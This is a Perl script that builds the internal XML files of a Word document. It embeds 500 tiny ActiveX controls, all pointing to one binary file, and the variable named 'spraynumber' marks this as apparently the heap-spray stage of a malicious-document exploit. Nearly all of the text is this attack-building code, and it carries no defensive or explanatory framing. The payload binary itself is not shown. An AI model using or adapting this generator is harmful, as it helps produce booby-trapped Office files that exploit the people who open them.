
my $spraynumber = 500;


my $directory = "word/";
unless(mkdir $directory) { die "Unable to create $directory\n"; }

$directory = "word/_rels";
unless(mkdir $directory) { die "Unable to create $directory\n"; }

$directory = "word/activeX";
unless(mkdir $directory) { die "Unable to create $directory\n"; }

$directory = "word/activeX/_rels";
unless(mkdir $directory) { die "Unable to create $directory\n"; }


# ----------------------------------------------------------------------------------------
# Create document.xml.rels file in word/_rels folder
# ----------------------------------------------------------------------------------------

chdir "word/_rels";

my $documentxmlrels1 =
"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\r\n".
"<Relationships xmlns='http://schemas.openxmlformats.org/package/2006/relationships'>\r\n".
"<Relationship Id='rId4' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme' Target='theme/theme1.xml'/>\r\n".
"<Relationship Id='rId5' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/image' Target='media/image1.wmf'/>\r\n".
"<Relationship Id='rId6' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings' Target='settings.xml'/>\r\n".
"<Relationship Id='rId7' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable' Target='fontTable.xml'/>\r\n".
"<Relationship Id='rId8' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles' Target='styles.xml'/>\r\n".
"<Relationship Id='rId9' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings' Target='webSettings.xml'/>\r\n";

my $documentxmlrels2 =
"</Relationships>\r\n";


my $fileout = "document.xml.rels";

open(my $myfile,">$fileout") or die "\n[+] Error creating file\n\n";
binmode $myfile;
print $myfile $documentxmlrels1;

for($i = 1; $i <= $spraynumber; $i++) 
{
   $j = $i + 9;
   print $myfile "<Relationship Id='rId$j' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/control' Target='activeX/activeX$i.xml'/>\r\n";
}
   
print $myfile $documentxmlrels2;

close($myfile);
print "\n[+] File $fileout created, copy file to the \\word\\_rels folder";
sleep(1);


# ----------------------------------------------------------------------------------------
# Create document.xml file in word folder
# ----------------------------------------------------------------------------------------

chdir "..";
chdir "word";

my $documentxml1 =
"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\r\n".
"<w:document xmlns:wpc='http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas'". 
" xmlns:mc='http://schemas.openxmlformats.org/markup-compatibility/2006'". 
" xmlns:o='urn:schemas-microsoft-com:office:office'". 
" xmlns:r='http://schemas.openxmlformats.org/officeDocument/2006/relationships'". 
" xmlns:m='http://schemas.openxmlformats.org/officeDocument/2006/math'". 
" xmlns:v='urn:schemas-microsoft-com:vml'". 
" xmlns:wp14='http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing'". 
" xmlns:wp='http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing'". 
" xmlns:w10='urn:schemas-microsoft-com:office:word'". 
" xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'".
" xmlns:w14='http://schemas.microsoft.com/office/word/2010/wordml'". 
" xmlns:wpg='http://schemas.microsoft.com/office/word/2010/wordprocessingGroup'". 
" xmlns:wpi='http://schemas.microsoft.com/office/word/2010/wordprocessingInk'".
" xmlns:wne='http://schemas.microsoft.com/office/word/2006/wordml'".
" xmlns:wps='http://schemas.microsoft.com/office/word/2010/wordprocessingShape' mc:Ignorable='w14 wp14'>\r\n".
"<w:body>\r\n".
"<w:p w:rsidR='00B45FA9' w:rsidRDefault='00097527'>\r\n".
"<w:r>\r\n".
"<w:object w:dxaOrig='1440' w:dyaOrig='1440'>\r\n".
"<v:shapetype id='_x0000_t75' coordsize='21600,21600' o:spt='75' o:preferrelative='t' path='m@4@5l@4@11@9@11@9@5xe' filled='f' stroked='f'>\r\n".
"<v:stroke joinstyle='miter'/>\r\n".
"<v:formulas>\r\n".
"<v:f eqn='if lineDrawn pixelLineWidth 0'/>\r\n".
"<v:f eqn='sum @0 1 0'/>\r\n".
"<v:f eqn='sum 0 0 @1'/>\r\n".
"<v:f eqn='prod @2 1 2'/>\r\n".
"<v:f eqn='prod @3 21600 pixelWidth'/>\r\n".
"<v:f eqn='prod @3 21600 pixelHeight'/>\r\n".
"<v:f eqn='sum @0 0 1'/>\r\n".
"<v:f eqn='prod @6 1 2'/>\r\n".
"<v:f eqn='prod @7 21600 pixelWidth'/>\r\n".
"<v:f eqn='sum @8 21600 0'/>\r\n".
"<v:f eqn='prod @7 21600 pixelHeight'/>\r\n".
"<v:f eqn='sum @10 21600 0'/>\r\n".
"</v:formulas>\r\n".
"<v:path o:extrusionok='f' gradientshapeok='t' o:connecttype='rect'/>\r\n".
"<o:lock v:ext='edit' aspectratio='t'/>\r\n".

"</v:shapetype><v:shape id='0' style='width:1pt;height:1pt'><v:imagedata r:id='rId5' o:title=''/></v:shape><w:control r:id='rId10' w:shapeid='0'/></w:object></w:r>\r\n";


my $documentxml2 =
"</w:p>\r\n".
"<w:sectPr w:rsidR='00B45FA9'>\r\n".
"<w:pgSz w:w='11906' w:h='16838'/>\r\n".
"<w:pgMar w:top='1440' w:right='1440' w:bottom='1440' w:left='1440' w:header='708' w:footer='708' w:gutter='0'/>\r\n".
"<w:cols w:space='708'/>\r\n".
"<w:docGrid w:linePitch='360'/>\r\n".
"</w:sectPr>\r\n".
"</w:body>\r\n".
"</w:document>\r\n";


my $fileout = "document.xml";

open(my $myfile,">$fileout") or die "\n[+] Error creating file\n\n";
binmode $myfile;
print $myfile $documentxml1;

for($i = 1; $i <= $spraynumber; $i++) 
{
   $j = $i + 9;
   print $myfile "<w:r><w:object><v:shape id='$i' style='width:1pt;height:1pt'><v:imagedata r:id='rId5' o:title=''/></v:shape><w:control r:id='rId$j' w:shapeid='$i'/></w:object></w:r>\r\n";
}
   
print $myfile $documentxml2;

close($myfile);
print "\n[+] File $fileout created, copy file to the \\word folder";
sleep(1);


# ----------------------------------------------------------------------------------------
# Create [Content_Types].xml file in root folder
# ----------------------------------------------------------------------------------------

chdir "..";

my $contenttypesxml1 =
"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\r\n".
"<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'>\r\n".
"<Default Extension='bin' ContentType='application/vnd.ms-office.activeX'/>\r\n".
"<Default Extension='wmf' ContentType='image/x-wmf'/><Default Extension='rels' ContentType='application/vnd.openxmlformats-package.relationships+xml'/>\r\n".
"<Default Extension='xml' ContentType='application/xml'/>\r\n".
"<Override PartName='/word/document.xml' ContentType='application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml'/>\r\n".
"<Override PartName='/word/styles.xml' ContentType='application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml'/>\r\n".
"<Override PartName='/word/settings.xml' ContentType='application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml'/>\r\n".
"<Override PartName='/word/webSettings.xml' ContentType='application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml'/>\r\n";

my $contenttypesxml2 =
"<Override PartName='/word/fontTable.xml' ContentType='application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml'/>\r\n".
"<Override PartName='/word/theme/theme1.xml' ContentType='application/vnd.openxmlformats-officedocument.theme+xml'/>\r\n".
"<Override PartName='/docProps/core.xml' ContentType='application/vnd.openxmlformats-package.core-properties+xml'/>\r\n".
"<Override PartName='/docProps/app.xml' ContentType='application/vnd.openxmlformats-officedocument.extended-properties+xml'/></Types>\r\n";


my $fileout = "[Content_Types].xml";

open(my $myfile,">$fileout") or die "\n[+] Error creating file\n\n";
binmode $myfile;
print $myfile $contenttypesxml1;

for($i = 1; $i <= $spraynumber; $i++) 
{
   print $myfile "<Override PartName='/word/activeX/activeX" . $i . ".xml' ContentType='application/vnd.ms-office.activeX+xml'/>\r\n";
}
   
print $myfile $contenttypesxml2;

close($myfile);
print "\n[+] File $fileout created, copy file to the root folder";
sleep(1);


# ----------------------------------------------------------------------------------------
# Create activeX[x].xml files in /word/activeX folder
# ----------------------------------------------------------------------------------------

chdir "word/activeX";

my $activeXxml =
"<?xml version='1.0' encoding='UTF-8' standalone='no'?>\r\n".
"<ax:ocx ax:classid='{00000000-0000-0000-0000-000000000001}' ".
"ax:persistence='persistStorage' r:id='rId1' ". 
"xmlns:ax='http://schemas.microsoft.com/office/2006/activeX' ". 
"xmlns:r='http://schemas.openxmlformats.org/officeDocument/2006/relationships'/>\r\n";


for($i = 1; $i <= $spraynumber; $i++) 
{
   my $fileout = "activeX". $i . ".xml";

   open(my $myfile,">$fileout") or die "\n[+] Error creating file\n\n";
   binmode $myfile;
   print $myfile $activeXxml;
   close($myfile);

}
print "\n[+] $spraynumber activex[x].xml files created, copy files to \\word\\activeX folder";
sleep(1);


# ----------------------------------------------------------------------------------------
# Create activeX[x].xml.rels files in /word/activeX/_rels folder
# ----------------------------------------------------------------------------------------

chdir "_rels";

my $activeXxmlrels =
"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\r\n".
"<Relationships xmlns='http://schemas.openxmlformats.org/package/2006/relationships'>\r\n".
"<Relationship Id='rId1' Type='http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary' Target='activeX1.bin'/>\r\n".
"</Relationships>\r\n";


for($i = 1; $i <= $spraynumber; $i++) 
{
   my $fileout = "activeX". $i . ".xml.rels";

   open(my $myfile,">$fileout") or die "\n[+] Error creating file\n\n";
   binmode $myfile;
   print $myfile $activeXxmlrels;

   close($myfile);

}
print "\n[+] $spraynumber activex[x].xml.rels files created, copy files to \\word\\activeX\\_rels folder";
print "\n\n";
sleep(1);







